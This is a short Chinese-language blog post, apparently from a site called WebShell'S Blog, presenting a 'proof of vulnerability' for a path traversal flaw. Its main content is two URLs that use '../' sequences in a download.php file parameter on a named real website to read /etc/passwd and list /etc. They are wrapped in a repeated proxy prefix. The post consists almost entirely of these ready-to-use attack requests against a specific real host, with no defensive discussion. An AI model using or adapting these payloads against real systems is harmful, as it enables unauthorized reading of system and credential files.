漏洞证明:

http://www.eset.com.cn/api/desk/download.php?file=../../../../../../../etc/passwd
http://www.eset.com.cn/api/desk/download.php?file=../../../../../../../etc

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1341.html